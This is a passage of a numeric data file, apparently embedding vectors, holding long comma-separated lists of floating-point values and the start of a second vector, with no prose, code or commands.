95337,0.019772004,-0.0013849615,-0.02543959,0.013254681,-0.008912203,-0.035572533,-0.0041332,-0.0059774155,-0.0065066614,0.013505836,-0.003388119,0.0024687275,0.0065056863,-0.015174087,0.013171023,0.016099092,0.015912702,0.02015949,0.0077429875,-0.009166081,0.009773579,0.019950602,0.04083042,0.014804368,0.026242368,-0.0019488605,-0.04209763,-0.0118829375,0.0029566323,-0.012860436,-0.031231998,-0.014573226,0.01800756,0.0031234396,0.008910257,-0.016988358,0.006971792,-0.0007687204,0.017514918,0.009715429,0.015406952,-0.020308897,0.026049418,0.0066649485,-0.005904867,-0.027383761,-0.0069240443,0.0071110064,-0.008381476,0.0027542426,-0.0069530383,-0.01164278,0.021178886,-0.034780696,0.011914075,-0.02366495,-0.0073172636,-0.016046157,0.019697975,0.012163151,-0.020773787,0.022723831,0.0067999717,0.00070215145,-0.01910452,0.005201175,-0.0011156731,-0.012308785,-0.0065970314,-0.014663807,0.012983013,0.009370598,-0.020837162,0.026390856,0.01757612,-0.020622384,0.016625613,-0.0061794063,-0.002650113,-0.006327374,-0.039767507,-0.005801517,0.029546177,0.012737188,0.011614748,0.0061702617,0.03611267,0.003168779,0.0068339943,0.0062231617,0.0051057013,0.010880742,-0.01915367,0.023756396,0.0008865211,-0.025161017,-0.004996682,0.0009825119,-0.025834128,0.0016119392,-0.0046308115,-0.004400125,-0.004713711,0.005068281,0.0030301036,0.010463379,-0.021869587,0.029052617,0.016793458,-0.011530335,-0.012823101,-0.02171187,0.019000674,0.0176795,-0.015925514,-0.005425792,-0.027672611,-0.025401806,-0.0016270328,0.013477399,0.013880774,-0.0040570814,-0.007442688,-0.0020221693,-0.010148513,0.006362525,0.024221154,0.009165022,-0.02724722,-0.0005252806,-0.0041727093,-0.0040111593,-0.000059062437,-0.012091094,-0.00037127722,0.012506803,-0.040541276,0.009702225,0.0014112804,-0.00010117853,-0.0018558792,0.045840397,-0.010261683,-0.0052024713,-0.025777237,-0.009209671,-0.0143365115,-0.016639061,0.0057304366,0.011770768,-0.0009821197,-0.015863426,-0.0065787556,0.0065660286,-0.025365492,0.011100818,-0.040153895,0.0023855863,-0.0073967557,-0.0046459627,-0.0033227673,-0.009599141,-0.0017934553,-0.019031378,0.012405653,-0.000096468175,0.026138358,-0.006551307,0.004369409,-0.033289433,-0.018613555,-0.0020601894,-0.023526616,0.011998824,0.004643275,0.009768207,0.0029090594,-0.006785149,-0.029268172,0.0026544551,-0.015533931,0.019522121,-0.012458917,0.08487229,-0.0005257511,0.0074077956,-0.0030185585,-0.012490375,0.04271543,0.030644754,-0.037290547,0.02650159,-0.0023164295,-0.0018615543,0.015286571,-0.02173818,0.019779315,-0.022081936,0.022383993,0.015685745,-0.0054698396,0.013302327,0.011425098,-0.019804798,0.0024287053,-0.015643284,-0.021944055,-0.012546186,-0.022513622,0.021672187,-0.027474526,-0.020872848,0.008963801,0.006658756,-0.0018025596,0.0053679687,0.015837291,0.036722682,-0.02758088,0.009622678,-0.01664924,-0.008958442,-0.03364445,0.01893729,-0.0026231231,0.014835477,-0.010333822,0.021390127,-0.0019246627,0.0679034,0.015996434,0.028226111,0.008904428,0.010274661,-0.004136511,0.012979265,0.013711201,-0.020165322,-0.015365913,0.013929257,0.028905444,0.0009830839,0.016791414,-0.012352342,0.0010080959,-0.010341644,0.0049887327,0.010414076,-0.00423159,0.01139322,0.009936085,0.0050697033,0.0022368515,-0.02551036,0.009149001,0.0024726782,-0.00908946,0.02924824,-0.0010219458,-0.014948687,-0.012106871,0.008032785,0.019995963,0.008210865,-0.06031055,-0.003684194,0.25472808,0.0066110333,0.005730271,0.04506583,0.004262447,-0.00014016009,-0.1276997,0.0054191155,0.0037121233,-0.014622649,-0.0038624753,-0.012265758,-0.021369591,0.0038246806,0.018347237,0.029434681,0.01659449,-0.019868737,0.02430169,-0.015331782,0.011760485,0.013139533,0.0057793846,0.0009936992,-0.024122685,-0.00393876,0.021762326,-0.011496169,0.0109660905,0.0036852495,-0.011841479,-0.009587723,0.013213906,-0.006246778,-0.04338617,0.0088961255,-0.00006433089,0.016534418,-0.00978495,-0.024046913,0.008451796,-0.0046074213,-0.012023929,-0.037348296,-0.16198933,0.020702425,-0.0024942972,-0.027680295,0.02461053,0.016603118,0.0027460437,-0.00012912185,0.018561471,-0.0024171416,0.019636903,0.0014076901,0.0005774478,0.016823897,0.0022881303,-0.006069903,-0.005059174,-0.0037045307,0.001771768,-0.0019982187,-0.00042008318,0.02495244,-0.027573843,-0.035980914,0.005744744,-0.00490672,-0.016669577,0.01237775,-0.018139224,0.008981123,-0.023259195,0.00938586,-0.02224224,0.010779745,-0.038164288,-0.006747378,-0.004367192,0.01627888,-0.008150471,0.02018661,0.0018162702,0.0016817352,0.0051635546,-0.0027192154,-0.010084692,0.020479947,0.043069996,-0.009402282,0.01052127,0.002606102,0.01997083,0.014739171,-0.0112129,0.0014227761,-0.01622828,-0.01217659,-0.000986077,0.004419293,-0.0043794475,0.0049729343,-0.014403582,-0.013071116,-0.026887648,-0.021147091,0.027311046,-0.011443837,-0.0039272876,-0.021067558,-0.008753503,0.002140781,0.005974592,0.008158237,0.010470329,0.00065665774,0.018112896,0.01319662,0.00021369162,-0.00035562943,0.0040500765,0.005856075,-0.016884139,-0.017300805,-0.015180338,-0.018323215,0.0011732116,-0.0012448069,-0.007966631,0.01815875,0.004538048,0.004271114,-0.0047961217,0.015447439,0.010870383,0.03505238,0.013164473,-0.0117296865,0.017824179,0.003855092,-0.02327573,0.025111077,-0.0016178521,0.0033983456,-0.0039347317,0.007850486,-0.012280476,0.00688936,0.003959397,-0.02752504,-0.035869874,-0.011194281,-0.022006217,-0.00084249926,0.002805926,-0.015895572,-0.019927936,-0.014220847,0.024824208,-0.019904807,0.0066827037,-0.011219057,-0.018399525,-0.029452687,-0.007857327,-0.008655658,0.01414608,0.0013481707,-0.008948654,0.000113450435,0.0073305923,-0.018891485,0.0010867298,-0.00017531443,-0.0013465027,0.0010368119,-0.008540989,-0.00032744362,-0.004846194,-0.018836308,-0.036724728,0.009469019,0.020915493,-0.009359617,0.006478669,-0.0025227366,0.010914177,0.014379464,0.019311499,0.0025174327,0.02108606,-0.015871197,-0.0008297463,0.029325772,0.016453203,-0.026923334,-0.021865278,0.089197055,-0.004795161,-0.007436356,0.014192742,-0.004270271,0.00734044,0.0309813,-0.00938998,-0.020865753,-0.030654289,-0.024405785,-0.004470301,-0.015572736,0.016735764,-0.018158464,0.008100857,0.023084363,0.0065482385,-0.003482826,-0.0056941416,0.022460544,-0.011058907,-0.0035999387,0.026764149,0.006523806,0.0054975157,0.0027961896,0.0010018762,-0.0067700013,-0.012497435,0.007593927,0.0006068319,-0.0034525401,-0.014892837,0.029019598,-0.037831116,-0.002524477,0.0005154634,-0.0026008699,0.013032053,0.01833395,0.006125145,0.009030993,-0.010929134,0.012790332,-0.012452504,0.0011777269,-0.0027428009,0.016640043,-0.0037565425,0.0036114678,0.027202023,0.015045693,-0.01701636,-0.004471932,-0.024205392,0.002299522,-0.009182401,0.011961816,-0.0072054146,0.02813823,-0.010676463,-0.014290713,-0.0028618088,0.0005149268,0.0082390085,0.011794262,-0.0052127894,-0.005450648,0.04047034,-0.003752532,-0.009562523,-0.0018982353,0.014547893,-0.00826683,-0.018533744,-0.01465129,0.010847743,-0.014268869,-0.009414429,0.00083773636,0.008463745,-0.0012899783,0.0020777876,-0.008355121,-0.061713528,-0.010247607,-0.016212355,0.000007670493,0.017756542,-0.005004644,0.009480626,0.011266793,0.00031064157,0.014462537,-0.0021308318,-0.007803426,0.0013314057,0.0095679015,-0.0099375015,-0.019844307,0.019364351,-0.013115726,0.004838542,0.0040463577,-0.014168908,0.004032937,-0.0060770432,-0.0060271374,-0.0019278427,0.00224337,0.011452483,0.025051553,-0.0034496896,-0.011048185,0.043225974,-0.015893852,-0.0074759433,0.0056397608,-0.013978782,-0.014805287,-0.0044970857,0.018313374,0.018776793,0.017517852,-0.009681864,-0.022118336,0.01841102,-0.027408266,0.005244538,-0.012569196,0.022981135,-0.013238103,0.015601831,0.00082941144,-0.006570226,0.018878054,0.023886021,0.0006956035,-0.009265137,-0.022302968,0.015161729,0.0027166787,0.01421838,-0.012691649,0.006372486,-0.0055250484,0.0022257138,-0.009927185,0.008096517,0.0003110488,-0.022578625,-0.018250618,-0.01209033,-0.010515404,-0.014513497,-0.027363693,0.0020449979,-0.011271629,0.005022132,-0.025861088,0.01794216,0.018539242,-0.013262118,-0.021613771,0.03247563,0.028456217,-0.0008538135,0.027168388,0.0035021168,-0.017231014,-0.01215252,0.0047377315,0.017888397,0.005239592,0.00091425766,0.017799322,-0.0030437696,-0.029017907,-0.011350697,0.033453103,0.0003536934,-0.043861803,-0.005181869,0.027724387,-0.017473647,-0.017253436,0.036052503,-0.0064454186,-0.0037648343,0.00163234,-0.0054560006,0.016141474,-0.0039310004,-0.010023133,-0.01135905,-0.001577565,-0.00096830074,0.015868643,0.007873083,-0.0055609345,0.030293966,-0.0052306373,-0.013484758,-0.016913498,0.004049649,-0.025332661,0.010092031,-0.023485707,0.013707387,-0.009270658,0.0064400076,-0.020962939,-0.0017759267,0.015526079,-0.00762363,-0.0080475025,0.007802608,-0.0068158987,-0.010435419,-0.006491975,0.0054334365,0.0038264198,0.038498998,-0.05033328,-0.009131921,0.007862868,0.09066468,-0.0081836255,-0.019005239,0.021009674,0.023817794,0.015586362,-0.012558683,-0.0073817465,-0.016762838,0.0022392252,-0.011174642,-0.026541015,0.0026059395,-0.009333429,-0.011105541,-0.0007966786,0.007445875,0.037538778,0.010405956,0.019204311,-0.012377701,0.011049743,0.015838075,0.007553969,-0.019619772,-0.034779485,0.01473215,0.00073196745,-0.008351535,-0.014949272,0.0056575797,-0.0130075775,-0.033445764,-0.0011536949,0.0032301669,0.00017010682,0.007788662,-0.016406737,-0.028160382,0.006482907,0.0074815494,-0.0052289576,0.0008972701,-0.009634085,0.00377625,-0.010708225,0.018775439,-0.008751247,0.003409354,-0.003616026,0.0045872205,0.022358775,-0.0071722358,-0.050943457,-0.004315664,-0.003362529,-0.005278106,-0.013869776,0.016194494,0.011778518,0.007346298,-0.0058068177,-0.012878413,-0.009747374,0.0031596215,0.02862271,0.00035163877,-0.018045926,0.0051443237,0.020836778,-0.004197479,0.009609506,-0.00029269527,-0.013276009,-0.009263099,0.0010490046,0.0064774244,0.006398933,0.034628674,0.013550486,-0.007026545,-0.00026794308,-0.00908156,0.006021233,-0.0019750234,0.019348271,-0.02160843,-0.0013151395,0.0007404032,-0.0047916435,0.03543192,0.026831303,0.00052443397,-0.008359484,0.015648577,-0.024864929,0.0017564287,0.005973618,0.0031904967,-0.029831294,0.0046131993,-0.018679721,-0.002679305,-0.0021861054,-0.0052125575,0.0036329485,-0.11385891,0.013345131,-0.02047665,-0.0058195065,0.00022559371,-0.0012737461,0.00891563,0.05958593,0.013403021,-0.019110376,0.01385723,0.004698653,-0.0034560682,-0.000039393824,0.024287947,0.015900062,0.00791286,-0.013994001,-0.011703022,-0.0076931976,0.025086675,-0.0029695693,-0.011826739,-0.016850742,-0.017739017,0.0072833993,0.01004509,-0.0018925794,0.023574006,0.010450876,-0.008953973,0.007589628,0.0064052194,0.008545689,-0.0067363717,0.0048679304,-0.04442008,0.022058882,-0.0062643536,0.0029845005,-0.0020224932,0.008053632,0.0055372,-0.009404852,-0.018460639,-0.0027658727,0.007580962,-0.0064901058,0.035264786,-0.020126088,0.013498796,-0.010502046,0.027707806,-0.011989182,-0.003185882,-0.030611075,-0.009056574,0.00057615514,0.018491467,-0.029597808,0.013717188,0.02105833,0.016921975,-0.021592824,-0.018680468,0.0044344952,0.008155097,-0.009457643,-0.011360498,-0.001571472,-0.0055063777,0.0059902007,-0.007359598,0.0022013183,-0.016618788,-0.0028968088,0.0047930046,-0.0004231666,-0.016661737,0.03115402,-0.010255314,-0.011471776,-0.0056319404,0.0052011227,0.003924822,0.018455017,-0.010730766,0.0013675779,-0.015966838,0.0071021803,0.01004337,0.035645362,-0.021972833,-0.023401393,-0.018164614,0.0065170657,0.0031439327,0.025250766,0.009923499,-0.0051727137,0.014400595,-0.010892228,0.009029574,-0.019057097,-0.15043218,-0.020790916,0.026165824,-0.0026364166,0.014160384,-0.012969018,-0.0155603625,0.0067827557,0.010080347,-0.005724056,-0.0076976274,-0.004238559,0.0336318,0.02851528,0.004532685,-0.0055686636,-0.017652338,0.0032578772,-0.017743547,-0.012248918,0.01184604,-0.010806279,-0.018855384,0.0012754954,0.020963518,-0.020471672,-0.017952306,0.009848732,0.0050878315,-0.011537773,0.0022606954,0.01816105,-0.0011347026,-0.01681467,-0.021099016,-0.03364602,0.024823442,-0.004811535,-0.014616618,-0.000052112806,0.03201696,-0.00042031796,0.0067777797,0.015488934,0.013004074,0.006735927,0.014156967,0.016386617,0.0244009,0.0063512637,0.00078341307,0.007251471,-0.042517062,-0.010068401,0.0044420753,-0.020213764,-0.0068076625,-0.006209187,-0.016609777,0.012809898,-0.0033748501,0.008719581,0.0062166573,-0.013645198,-0.017989898,0.019301655,0.008000041,0.0035369028,0.016119048,0.013140786,-0.019028315,0.015396432,0.038315635,-0.026827767,0.019358762,0.02024763,-0.014075428,0.022634981,0.015000427,0.003151007,0.011820332,0.009105027,-0.008841543,0.01734129,-0.007201696,0.0006460488,-0.008841343,0.028343778,-0.0073570334,0.028993243,0.0027485504,0.027387073,-0.023661623,-0.0048295017,0.029941754,-0.020792179,-0.002575237,0.0011503246,0.014348698,0.006763681,-0.020741351,-0.020977274,-0.012516474,-0.0003962705,0.00387941,-0.0032889503,-0.013741315,-0.012411044,-0.010103749,0.005862979,0.006105416,0.041563187,-0.01979338,0.006496958,-0.0031314145,0.0069844453,-0.020537285,-0.0026929025,-0.002845105,-0.0007416927,-0.0145812305,0.01832636,0.0076345876,0.0070345504,-0.024413899,0.009517424,0.0023877833,0.025896491,0.017054984,-0.021600608,0.01085127,-0.0068776715,0.014821166,-0.029678548,-0.0050574793,0.012164883,-0.007979658,-0.002737125,0.0036845598,-0.0025306498,-0.027667448,0.016434293,0.0042078947,0.018248888,-0.010445309,-0.020315886,0.0045221685,0.013741172,-0.00318422,0.0074654925,-0.0063970443,0.00067319965,0.012622285,-0.015432825,0.006773696,0.010074381,-0.0103657665,-0.0009113637,0.027866425,0.005950856,0.029899176,-0.0063497243,0.021108782,-0.01055705,0.004253217,0.016908525,-0.0006748739,0.015547376,0.007287959,0.013419022,-0.00044557865,-0.0024837076,-0.0019892745,-0.00682464,0.021773826,0.037544213,0.011226614,0.039031282,0.009945313,0.010804778,0.032473676,-0.000096390584,-0.027472848,0.0016494765,-0.0011852251,0.0022514455,0.003705378,0.014154896,0.01642925,-0.0070195664,0.011912159,-0.006666562,0.0009033528,-0.009679669,-0.011257434,0.0015982206,-0.003176416,-0.00306846,0.018756574,-0.03193432,-0.00012510504,0.035001896,-0.014686033,-0.015216968,0.0023765962,0.016566169,0.006544288,0.029856041,0.008652182,0.0014213596,-0.010949708,-0.021902323,0.008654079,0.03373554,0.0022670336,-0.0028671138,0.006327434,-0.0225267,0.020856155,-0.0010515042,-0.0077016167,-0.0060584927,0.006777343,-0.012135386,-0.0033050503,0.020134054,0.016901072,0.015041202,-0.0021036807,0.0006282973,0.020116301,0.008407333,-0.0026999027,0.011056848,0.021199878,0.016379816,0.015736368,0.0018083521,-0.0036538253,0.0012849008,0.010435582,0.013549934,0.022420105,-0.0017934659,-0.0070356876,-0.017102364,-0.00083072996,0.009249774,-0.026403574,0.020268017,-0.0017933317,-0.006134482,-0.010026812,-0.0063420706,0.014650028,-0.0045596813,0.009126115,0.006713963,-0.0007810279,0.001472313,-0.022396566,-0.01652073,-0.0062293103,0.022900632,-0.002591746,-0.026691705,0.0076942304,-0.041353006,-0.005283386,0.00344693,0.0068965564,0.024019297,0.014791493,0.022900583,0.004537767,-0.00058506866,-0.016473006,-0.024470111,-0.0011695724,0.0044853264,-0.0009399745,-0.021188702,-0.021801637,-0.020252047,-0.009478848,-0.0028669024,-0.012050312,-0.009770461,-0.0047701527,0.0036314004,0.026579032,0.00035567043,0.0031262767,-0.034614336,-0.019083172,0.017453225,0.016122622,-0.0046324544,-0.0110234,0.011522694,0.005308295,0.009845896,-0.012953118,0.021030255,-0.01474112,0.005477194,-0.0068698823,0.01812959,-0.00928237,0.0015371238,0.0011375154,0.0063451626,-0.009898577,0.01256911,-0.0052403077,-0.008097529,-0.012843844,-0.000024527579,-0.012982424,-0.010703257,0.011703932,-0.023844322,0.01610305,0.0017809834,0.015044217,0.004127849,0.0025839196,0.003732631,-0.011241087,0.013386437,0.012944618,0.0033762788,-0.018714564,-0.013650093,0.020258801,-0.0043580704,-0.002575891,0.018587843,0.013217156,0.01736914,-0.000970623,-0.0031716374,-0.01300249,-0.03240965,0.012583231,-0.01936903,0.011744722,0.0029178814,0.017580304,-0.0030453675,-0.004559744,0.0021442457,0.0033944184,0.02437578,0.005153545,-0.0077992086,-0.028961053,0.0048283557,0.008989992,0.0064336513,-0.040042616,0.014270199,-0.0008510455,0.003913158,-0.0053013214,0.013692733,-0.0040652617,0.008448447,-0.021225508,-0.00053119595,0.005236013,0.0039146952,-0.013906321,-0.0051087053,-0.030343702,-0.055106055,0.015985735,0.01777319,-0.027704539,0.030385701,0.010051425,-0.022082899,-0.019475885,-0.019645134,0.0061884406,-0.00027708116,0.00021310833,0.016318275,0.014919232,0.01921767,0.0010918591,0.003698789,0.013449699,0.01880954,0.015224316,-0.018245406,0.03164667,-0.007924096,0.016869199,0.008326749,0.0016627078,-0.001356853,-0.002705927,-0.02331855,-0.0050870925,-0.02193599,-0.011307027,-0.029153919,-0.012361856,-0.0023873542,-0.0014050149,0.0009346831,0.015249193,0.0016245976,-0.011739674,-0.00006912712,0.0062522856,0.011174934,-0.0020393278,-0.0030726825,0.025764665,-0.023731349,-0.028933723,-0.015929112,0.009233408,0.021455504,-0.0006170099,-0.0025627546,-0.0026134225,0.0067707053,0.02016864,0.017837826,0.001210285,0.023397608,0.005886967,-0.013709163,-0.012935092,0.024516998,0.003087922,0.0049696458,0.017733186,-0.0044757547,0.029607335,-0.010990456,0.014202461,0.008731596,-0.008506969,-0.012891809,-0.010314073,-0.010103847,0.025691241,0.008168239,-0.0018668259,0.0121421795,0.025316048,0.0067168656,0.0052632233,0.028760767,-0.004946094,-0.0026787608,0.004799159,-0.018121077,-0.010815001,0.043406736,0.0123782735,0.022457333,0.012882047,0.0049509103,-0.009347843,-0.01261958,0.012993383,-0.00056631013,-0.0023132744,0.020289993,0.015258178,-0.0074672787,-0.009279218,-0.00061623857,0.0124961855,-0.0035112433,0.016413113,-0.005763225,0.009217973,0.013201495,0.0013038674,-0.0068783034,0.029268775,0.018604282,0.02817959,0.016475134,0.035708908,-0.0053854645,0.015776735,-0.026823005,0.005538847,-0.02583151,-0.011524427,-0.027842117,0.0029000526,0.008616937,0.0018529451,-0.0041126306,0.016471352,-0.018911028,-0.01442445,-0.011864993,0.018742835,0.0057065734,0.026412247,0.0063738273,0.0137285935,0.001311243,0.017592158,-0.022517497,0.00023558796,-0.011356927,-0.0037834034,-0.0090117855,-0.0062391143,-0.01200755,0.028948221,-0.0037505834,-0.009007504,-0.010660987,-0.013724997,0.0064196493,0.0022502623,-0.0071239085,0.0077845836,0.009599457,0.004780023,0.026705882,-0.00034471665,0.010852921,0.021683281,-0.009247031,-0.0019196251,0.019370535,-0.00488338,-0.0071497248,0.004958462,0.014172474,0.013891352,0.0025668882,-0.02500416,-0.026781809,0.007711528,0.018050922,-0.017050914,-0.0019068819,0.019041834,0.009035112,0.016952138,-0.019207237,0.0026653232,-0.008030009,-0.015433374,-0.0050044223,0.009886404,-0.0020662101,-0.0072023575,-0.023752477,-0.011762122,-0.015720591,-0.02772597,-0.010954397,-0.010500729,0.004234872,0.038851764,-0.03096057,-0.0014807733,-0.008107918,0.017154157,-0.023036012,0.02129829,-0.01617044,0.011895354,0.018645283,0.013634686,0.011622909,0.008384312,-0.011039599,-0.010541972,0.005480675,0.007413409,0.0092615755,-0.0023858424,0.0018905594,0.09895679,0.007772694,-0.0123735005,-0.010524294,0.002189304,0.026586208,0.026733616,0.010604822,0.007360847,0.008468801,0.0072075184,0.003958279,0.010072452,-0.008591795,0.03011884,0.011497021,0.01655983,-0.0042843963,-0.0030771242,-0.0011319354,0.023339847,0.009001863,-0.014431777,-0.012303485,-0.0011389493,-0.041137084,-0.00025092458,0.021756211,-0.0030651467,0.014969618,0.025456933,0.008609461,0.013112236,0.0071833753,0.006525408,-0.003906535,-0.00095310755,-0.020187173,0.009370667,-0.0046863384,0.018219518,0.009462155,-0.0069053965,-0.017915808,-0.029900406,-0.011087474,-0.003391438,-0.01934432,-0.005094383,-0.004427401,0.0058998633,0.034496892,-0.0005993431,0.010399503,0.008680019,0.014986347,-0.0076440913,-0.014425574,0.010707264,-0.016893988,0.032056853,-0.0195306,-0.0069176992,-0.010578604,0.028693225,0.00047096162,-0.024008188,-0.006633114,-0.029668227,-0.037377242,0.026723402,-0.013812649,0.024717784,0.019234637,-0.021202164,0.012526133,-0.009604402,0.004054826,0.015356582,-0.020685859,-0.00086751336,0.0040108794,-0.004577622,-0.0030315972,0.01508788,0.005743133,-0.0026307085,0.012259049,0.018336607,0.009549173,-0.01284761,0.020604976,0.0066727973,-0.020335864,0.002599434,0.017528895,0.030609883,0.011173126,0.00029888333,-0.008346534,0.018280115,-0.0013160185,-0.00040596566,0.0038589216,-0.009060364,0.004979827,0.0033122888,0.013529358,0.0008758047,0.000048099457,0.017182335,-0.0024923775,0.015328812,-0.016841955,0.009316988,-0.017833527,-0.032897495,-0.039334863,-0.002615571,-0.01398625,-0.00877515,0.017715529,0.0146920765,0.034929894,-0.007717438,0.013828163,-0.02321829,-0.0021298472,-0.0036600402,-0.0016844517,0.024667686,-0.024526188,-0.0077204066,0.009348316,-0.00094536506,-0.0038594108,0.012713183,0.010352882,0.013475566,0.014820234,0.033343617,0.011263754,-0.0135681,0.0030413137,0.015834222,-0.025718005,0.016902307,-0.014994223,0.019005222,0.014226628,0.0017124241,0.026459735,0.0001770168,-0.0026087733,-0.01049651,-0.025333168,-0.0034302939,-0.005702674,-0.025188034,-0.003820242,0.0060423613,-0.01390803,0.037959665,-0.020786716,0.0052920016,0.0020525479,-0.005578395,0.011944069,0.0044392617,-0.00740102,-0.029036395,-0.01600739,-0.020962343,-0.008312812,0.0064497595,-0.013262757,0.009159729,0.0034492693,-0.0039541093,0.020551655,0.0037559548,0.012086432,-0.00019537253,0.010145617,0.011998856,-0.016310947,0.0070679416,0.011386107,-0.00041372146,0.020862704,-0.0018066966,0.0063291555,0.0023074246,0.009269991,-0.012942357,0.0060176663,-0.029216563,0.025399053,-0.0150432605,-0.04056915,0.0010076604,-0.00030800546,0.00055538036,0.011554925,0.010098332,-0.01710962,-0.01435812,-0.017970126,-0.004083188,0.007089563,0.0107399775,-0.0015788737,-0.011319441,-0.02529038,-0.018738266,0.016780054,-0.028279686,0.004862348,-0.04241258,0.012994417,0.014258581,-0.01601613,-0.019802626,0.009958762,0.011359825,-0.0022027676,0.013262874,0.025941841,0.014875365,-0.014232433,0.0041718767,-0.0026439952,-0.011557399,0.0032841014,0.0044027716,-0.011108403,0.0070098676,0.013765492,0.012155599,-0.006789343,0.0083329175,-0.0021089888,0.0038573227,0.0071374327,-0.0261449,-0.017033692,-0.010221931,-0.013537399,-0.012212673,-0.019580074,-0.0018836476,0.009350914,-0.013360459,0.008814546,-0.025401672,0.0029576006,-0.0021361664,0.0019152558,0.010906154,-0.021854572,0.027972318,0.001762524,0.00007435171,0.021508945,-0.00075352937,-0.014901129,0.0050153765,0.014032763,0.00044433706,-0.018061096,-0.02511906,0.015814949,-0.014737616,-0.018702494,-0.0120538445,0.008634047,-0.008766346,-0.0047788317,-0.00058775174,0.010672982,-0.0036343005,-0.025919944,0.036807198,-0.023445617,-0.0090537695,0.0028442706,0.016115459,-0.016954027,0.023641977,-0.06665675,0.012542173,0.0017936586,-0.031068748,-0.02036193,-0.00042408152,-0.013573388,-0.06974505,-0.018263346,0.028200496,-0.021801095,-0.010271309,-0.03481933,0.021961289,-0.0074400655,-0.023879305,-0.015484069,0.000071147035,-0.0059920745,0.005416917,0.032866415,-0.0042222785,-0.004364469,0.007436574,-0.020309456,0.017984578,-0.015380539,0.004489348,-0.01243464,-0.003862229,-0.014528277,0.010106982,-0.020678582,0.01522075,0.0026508404,0.006912805,0.0025061844,0.018440219,-0.021715257,-0.016999133,-0.050259188,-0.005929368,-0.0005290457,0.022101458,0.005854465,0.0033610468,0.018424952,0.007720593,0.12801923,-0.022420695,0.008662849,-0.031607654,-0.001632158,-0.008593578,0.0075548785,0.0019557031,-0.00841483,-0.0022111784,-0.012045856,0.005692871,0.009379171,0.006752953,-0.00386423,-0.011717868,0.013389446,0.112222105,0.01708835,0.010270589,0.02933593,-0.016670512,0.026848255,0.0194423,0.0056105363,-0.08802883,-0.0087565,-0.016399328,0.021506932,-0.0062409476,0.008246206,0.014188825,0.007452315,0.017649518,-0.015820982,0.034874234,-0.018008783,0.009627578,-0.024058048,-0.008141132,0.009107309,-0.007179687,0.01204184,0.021406578,-0.008184598,0.018503461,-0.024370518,-0.0005285653,0.015309408,0.03582073,0.006389299,0.0062708654,0.011588385,-0.008470594,-0.0038040818,0.01775914,0.009170103,0.018705785,-0.023599938,0.00094002404,0.01562172,0.005799583,0.0004589715,0.008809572,-0.015361744,-0.007896756,-0.009302482,-0.014334653,-0.0079548815,0.0070763747,-0.022235349,-0.01794522,-0.009809475,0.0062818285,-0.004592962,0.0011767027,-0.0011623416,-0.0020125983,0.0009997726,-0.016240811,0.016396973,0.021889482,-0.015957072,0.010789178,0.006684944,0.03453029,-0.004945377,-0.007941255,0.006487455,0.011460692,-0.02205623,-0.0034429135,-0.0035435548,-0.016406398,-0.004648954,0.017405333,0.0014739468,-0.01674168,-0.021747097,-0.0074882745,0.005548055,-0.0042562447,-0.009726881,0.009554064,0.004508897,-0.0018434351,-0.008480343,-0.003681811,0.016175682,0.0029628589,-0.0045406506,0.014429436,0.015093469,0.00028310993,-0.0010139976,-0.013052291,0.02814244,0.01722525,-0.017528182,0.022195833,-0.008108946,-0.0039865095,0.02051139,-0.00978465,-0.010333479,-0.0051663667,0.0067676865,-0.012240671,-0.030704824,-0.016241867,-0.010026384,-0.0069912104,0.00072605355,-0.0031460968,0.015347719,0.0024183416,0.006846201,-0.026607132,-0.0012004961,-0.00019925112,-0.01969754,0.01825475,-0.009762701,0.030497605,-0.015628831,-0.0039887577,0.016871573,-0.023644483],[-0.0033405654,0.017734297,-0.0031867283,-0.022500785,0.0029891059,0.008317346,-0.011083655,0.016275803,0.007958139,0.0065946053,0.0014877359,0.024815353,-0.012461433,0.008101916,-0.014794414,0.009412796,0.015181984,0.012058071,0.009906686,0.009972732,0.008273804,-0.020438794,0.0019966608,-0.018003665,0.01952214,0.026901668,0.0022551424,0.004916574,-0.0023948874,0.00039455233,0.031383723,0.018229825,-0.0014782673,-0.009635074,0.018214786,0.006099564,-0.0048632436,-0.026191609,0.0040053446,-0.015302557,0.016405364,-0.006378754,-0.011364346,0.0027991282,-0.014895902,-0.009732717,-0.027429737,-0.029701682,-0.02707691,-0.0014064499,-0.025047673,0.021588055,-0.020373018,-0.008826413,-0.03500449,0.00013048045,-0.008380719,-0.031131515,0.01074354,0.0073319897,0.0015144766,0.026226383,0.0063076583,-0.005030659,0.04585308,0.00021661357,0.019813037,-0.0054873372,-0.03385187,-0.00885892,0.027430983,-0.0059039705,-0.0096320035,0.01704331,-0.006474451,0.005094844,-0.00092393236,-0.012695995,-0.0077696727,-0.024773462,-0.029907746,-0.021105759,0.02065896,-0.005369947,-0.003074878,-0.0014663339,-0.0031195427,-0.011648113,-0.018623404,0.0014386481,-0.015547413,0.015744105,0.0016804895,0.0068781488,0.009471838,0.015373805,0.030095771,0.006292062,0.010042527,-0.0027892415,-0.003628914,-0.00194645,0.0011497893,-0.0044536833,-0.00021180582,-0.0052212896,-0.0039569065,0.027437424,0.02238863,-0.00011469986,-0.0022385966,0.019160394,0.009560671,-0.0028461164,-0.0035646798,-0.016649708,0.0016832638,0.012325863,-0.009488487,0.013592583,0.014846528,-0.021235306,0.007782094,-0.019530717,-0.008576884,-0.015611831,0.0020902355,0.017000247,-0.017311903,-0.0022726853,0.0011912177,0.018060898,0.0021017625,-0.002566295,0.0049237674,-0.0023725382,0.0015943801,-0.004803264,0.0016697416,-0.020626757,0.0006041143,0.013184127,0.038555376,0.018045513,0.009580741,-0.015102539,0.004817904,0.008766586,0.017620709,-0.0043132296,0.0069005424,0.01642719,0.030612452,-0.012318019,-0.0072489395,0.0062717856,-0.03636132,-0.017122943,0.018857723,0.007415788,0.020574262,-0.0027087994,0.0010676915,0.019573899,0.0012934315,-0.0053733685,-0.011359671,0.028446203,-0.003920213,-0.012502224,0.0018519802,0.02467173,0.016038999,-0.0078071984,-0.0064345933,-0.018805541,0.008945177,0.00008811177,-0.00770584,0.0015146891,-0.008688297,0.004642561,0.0076923496,-0.0015827373,-0.0007359905,0.006406458,0.016044782,0.032854024,0.019675732,-0.0031758798,-0.016517503,0.014064519,-0.0075875954,-0.009377789,0.00042236934,-0.011521664,-0.017655414,0.11269069,-0.0056543103,-0.011124916,0.008301698,-0.003929454,-0.012375995,-0.05833377,-0.0074449894,-0.011661752,-0.036056012,-0.023479361,0.0063003157,-0.015556092,0.014710178,-0.03559981,0.0119698495,0.017417863,-0.0028099495,-0.08482748,-0.016863374,0.027979117,-0.013586105,0.008741048,-0.019674726,0.005140254,-0.0118537545,-0.0055348994,0.0017628156,-0.0013156323,0.01118306,-0.0036113493,0.011453649,-0.0036579298,0.022507632,0.007942988,